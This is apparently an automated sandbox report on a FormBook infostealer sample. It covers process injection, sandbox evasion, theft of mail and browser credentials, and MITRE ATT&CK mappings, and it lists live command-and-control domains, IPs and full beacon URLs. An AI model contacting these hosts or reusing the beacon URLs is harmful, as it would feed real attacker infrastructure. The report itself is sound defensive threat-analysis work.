                Source: qlG7x91YXH.exe, 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                Source: qlG7x91YXH.exeBinary or memory string: WIN_XPe
                Source: qlG7x91YXH.exeBinary or memory string: WIN_VISTA
                Source: qlG7x91YXH.exeBinary or memory string: WIN_7
                Source: qlG7x91YXH.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000001.00000002.2268978745.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014344224.0000000002A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3015748227.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3015655468.0000000001430000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3014639405.0000000002D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2269397258.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.2268552454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3015861642.00000000048D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DF1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00DF1204
                Source: C:\Users\user\Desktop\qlG7x91YXH.exeCode function: 0_2_00DF1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00DF1806

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		1
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		31
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                Software Packing                		LSA Secrets341
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		1
                DLL Side-Loading                		Cached Domain Credentials12
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Valid Accounts                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                Access Token Manipulation                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
                Process Injection                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587751 Sample: qlG7x91YXH.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 28 www.313333.xyz 2->28 30 www.wuyyv4tq.top 2->30 32 3 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 qlG7x91YXH.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 10->66 68 3 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 sUcUmdUxGfN.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 ROUTE.EXE 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 sUcUmdUxGfN.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.313333.xyz 103.120.80.111, 49933, 49951, 49968 WEST263GO-HKWest263InternationalLimitedHK Hong Kong 22->34 36 www.wuyyv4tq.top 156.226.63.13, 49827, 80 COMING-ASABCDEGROUPCOMPANYLIMITEDHK Seychelles 22->36 38 2 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                qlG7x91YXH.exe76%VirustotalBrowse
                qlG7x91YXH.exe74%ReversingLabsWin32.Trojan.AutoitInject
                qlG7x91YXH.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.wuyyv4tq.top/0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=0%Avira URL Cloudsafe
                http://www.313333.xyz/5jna/0%Avira URL Cloudsafe
                https://www.west.cn/cloudhost/0%Avira URL Cloudsafe
                http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)0%Avira URL Cloudsafe
                https://www.west.cn/jiaoyi/0%Avira URL Cloudsafe
                https://www.west.cn/ykj/view.asp?domain=313333.xyz0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top0%Avira URL Cloudsafe
                https://www.west.cn/services/mail/0%Avira URL Cloudsafe
                https://www.west.cn/services/webhosting/0%Avira URL Cloudsafe
                https://www.west.cn/services/domain/0%Avira URL Cloudsafe
                http://www.313333.xyz/5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBC0%Avira URL Cloudsafe
                http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/0hqe/0%Avira URL Cloudsafe
                http://www.mzkd6gp5.top/0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBC0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.epayassist.net
                		208.91.197.27
                		truetrue
                  		unknown
                  www.mzkd6gp5.top
                  		104.21.80.1
                  		truetrue
                    		unknown
                    www.mosquitoxp.lol
                    		127.0.0.1
                    		truefalse
                      		unknown
                      www.313333.xyz
                      		103.120.80.111
                      		truetrue
                        		unknown
                        www.wuyyv4tq.top
                        		156.226.63.13
                        		truetrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.wuyyv4tq.top/0qmw/?3fo=rJKpKBC&h0Z4uv=278+fPNRLmRxSvCH34hbLODYmABWu8vkjuqqbvjl/R4r9MC/xh0rLSqKPcdQtIyz70t8P1XMFdXw2YmeVp9Igz5U6icI9PUQLWv4eV+o4CclGEV4ym29rSk=true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.313333.xyz/5jna/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.313333.xyz/5jna/?h0Z4uv=o8GwGASYBJt/nb/piMB5DNiJPc8rJicYda1NcmeQznd2DA1k1E5AtP7RU4WuyFuLPAN95z5B1yv6cgM9wMfZloOraKLvaksg7S1pHUhIybvdcNjqXcBCCD0=&3fo=rJKpKBCtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mzkd6gp5.top/0hqe/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.mzkd6gp5.top/0hqe/?h0Z4uv=DKA1iVPcoZUjyp2kMNYgPydN8TVlv2BCRXxU2Kub3rtTiJbt+pfDiXzRopvp7VMLzDHcJo8PeW6VBgWmqyKjijxSdggTsAG5c4hPlmGpc/Wen6gVL7B2F3s=&3fo=rJKpKBCtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://ac.ecosia.org/autocomplete?q=ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://www.west.cn/ykj/view.asp?domain=313333.xyzROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/chrome_newtabROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.mzkd6gp5.topsUcUmdUxGfN.exe, 00000007.00000002.3015655468.00000000014B4000.00000040.80000000.00040000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://duckduckgo.com/ac/?q=ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.west.cn/services/webhosting/ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.west.cn/jiaoyi/ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.west.cn/services/domain/ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://www.west.cn/services/mail/ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://hm.baidu.com/hm.js?352bf0fb165ca7ab634d3cea879c7a72ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.west.cn/cloudhost/ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)ROUTE.EXE, 00000006.00000002.3019334755.0000000006280000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000006.00000002.3016728519.0000000003E06000.00000004.10000000.00040000.00000000.sdmp, sUcUmdUxGfN.exe, 00000007.00000002.3016414395.0000000003856000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ecosia.org/newtab/ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=ROUTE.EXE, 00000006.00000002.3019443962.0000000007CCA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            103.120.80.111
                                            		www.313333.xyzHong Kong
                                            		139021WEST263GO-HKWest263InternationalLimitedHKtrue
                                            156.226.63.13
                                            		www.wuyyv4tq.topSeychelles
                                            		133201COMING-ASABCDEGROUPCOMPANYLIMITEDHKtrue
                                            104.21.80.1
                                            		www.mzkd6gp5.topUnited States
                                            		13335CLOUDFLARENETUStrue

                                            Private

                                            IP
                                            127.0.0.1

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1587751
                                            Start date and time:2025-01-10 17:42:18 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 42s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:8
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:2
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:qlG7x91YXH.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:f57ac51331e5239f4cae4e94cbeb985860a6304b5e4822e638e7122915d8a7a2.exe
                                            Detection:MAL
                                            Classification:mal100.troj.spyw.evad.winEXE@7/5@5/4
                                            EGA Information:
                                            • Successful, ratio: 75%
                                            HCA Information:
                                            • Successful, ratio: 98%
                                            • Number of executed functions: 53
                                            • Number of non-executed functions: 292
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target sUcUmdUxGfN.exe, PID 5308 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing disassembly code.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            11:44:44API Interceptor676032x Sleep call for process: ROUTE.EXE modified

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            103.120.80.111CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • www.313333.xyz/5jna/
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • www.cotti.club/3ej6/
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • www.cotti.club/3ej6/
                                            pismo1A 12.06.2024.exeGet hashmaliciousFormBookBrowse
                                            • www.zhuan-tou.com/lx5p/
                                            CFV20240600121.exeGet hashmaliciousFormBookBrowse
                                            • www.zhuan-tou.com/lx5p/
                                            BMhDm7YW62.exeGet hashmaliciousFormBook, NSISDropperBrowse
                                            • www.633922.com/m858/?yRV=coEloaOWB4ccjb+v6cLGO3+aXUsmpIWjCRRWxfkEZg7Qbr+sYY/0Gc0G57svkQNplbCaP8Xe0B9P1hE+GhuMVBij7PKQzh7NHQ==&GJ=C4IdWhJXSFOXR8D
                                            Payment_Copy_[SWIFT_COPY].exeGet hashmaliciousFormBook, NSISDropperBrowse
                                            • www.633922.com/m858/
                                            Invoice_&_SOA_ready_for_dispatch.exeGet hashmaliciousFormBookBrowse
                                            • www.633922.com/udwf/?G0Yxd2Q=EgoyY5F9PuSC7IWgflDFG7vO7ChOxNSXUZQtmoKTqYmDoJiW0KocQ9ej5sZbxdFlzd/pkXvUfPTapOCXwmOa8U5eEphhhK4tvg==&pp=dZa4
                                            Request_List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                            • www.633922.com/oiwu/?Jz0HU=+L/6O+Q8u+ajcbZGgAmmZd+NMVb04NFrpK29B3gBvKtIEVSU5Z3YQVU7jFSO9jVfLdoVnndqUGYQzkOx6q7e3NvCIXwJmOpdTA==&M4=XF_T
                                            881SP1exr1.exeGet hashmaliciousFormBookBrowse
                                            • www.lpqxmz.site/4hc5/?ntxh9=V48LzvX0&P6=245SFh9gPs7u7SMvCZq1WQwUtHwLu6OXJLdJjwoxg6CFn9y4LEhCSrC/ms6Ftk+AVu/2
                                            156.226.63.13z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                            • www.wuyyv4tq.top/mrxb/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            www.epayassist.netCJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 208.91.197.27
                                            www.313333.xyzCJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 103.120.80.111
                                            www.wuyyv4tq.topz1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                            • 156.226.63.13
                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 156.226.63.13
                                            www.mzkd6gp5.top1162-201.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.1
                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.32.1
                                            QUOTATION#070125-ELITE MARINE .exeGet hashmaliciousFormBookBrowse
                                            • 104.21.96.1
                                            QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                            • 104.21.64.1
                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 172.67.158.81

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            WEST263GO-HKWest263InternationalLimitedHKsora.arm7.elfGet hashmaliciousUnknownBrowse
                                            • 103.24.254.164
                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                            • 103.120.80.111
                                            jew.mpsl.elfGet hashmaliciousUnknownBrowse
                                            • 218.247.91.232
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • 103.120.80.111
                                            Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                            • 103.120.80.111
                                            la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                            • 218.247.91.241
                                            SecuriteInfo.com.Heur.29270.15038.exeGet hashmaliciousPureLog StealerBrowse
                                            • 218.247.64.168
                                            tVdq8lEt3e.elfGet hashmaliciousMirai, OkiruBrowse
                                            • 103.108.227.184
                                            PROFORMA INVOICE BKS-0121-24-25-JP240604.exeGet hashmaliciousFormBookBrowse
                                            • 218.247.68.184
                                            p4LNUqyKZM.exeGet hashmaliciousFormBookBrowse
                                            • 218.247.68.184
                                            CLOUDFLARENETUS44742054371077666.jsGet hashmaliciousStrela DownloaderBrowse
                                            • 172.64.41.3
                                            http://atozpdfbooks.comGet hashmaliciousUnknownBrowse
                                            • 104.17.25.14
                                            http://infarmbureau.comGet hashmaliciousUnknownBrowse
                                            • 104.16.40.28
                                            r5yYt97sfB.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                            • 104.21.80.1
                                            RmIYOfX0yO.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                            • 104.21.80.1
                                            zAK7HHniGW.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 104.21.112.1
                                            MtxN2qEWpW.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 104.21.112.1
                                            IUqsn1SBGy.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            8nkdC8daWi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            • 104.21.96.1
                                            b5JCISnBV1.exeGet hashmaliciousSnake KeyloggerBrowse
                                            • 104.21.16.1
                                            COMING-ASABCDEGROUPCOMPANYLIMITEDHKhttp://38133.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                            • 156.224.208.119
                                            http://40608.xc.05cg.com/Get hashmaliciousUnknownBrowse
                                            • 156.224.208.119
                                            emips.elfGet hashmaliciousMiraiBrowse
                                            • 156.250.110.142
                                            PO_62401394_MITech_20250601.exeGet hashmaliciousFormBookBrowse
                                            • 154.197.162.239
                                            Order Inquiry.exeGet hashmaliciousFormBookBrowse
                                            • 154.197.162.239
                                            armv6l.elfGet hashmaliciousMiraiBrowse
                                            • 154.197.141.202
                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                            • 154.197.162.239
                                            inv#12180.exeGet hashmaliciousFormBookBrowse
                                            • 154.197.162.239
                                            vcimanagement.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.241.105.229
                                            vcimanagement.armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 156.241.72.39

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\092Ny-13W

                                            Download File
                                            Process:C:\Windows\SysWOW64\ROUTE.EXE
                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                            Category:dropped
                                            Size (bytes):114688
                                            Entropy (8bit):0.9746603542602881
                                            Encrypted:false
                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                            C:\Users\user\AppData\Local\Temp\aut9D99.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\qlG7x91YXH.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):14988
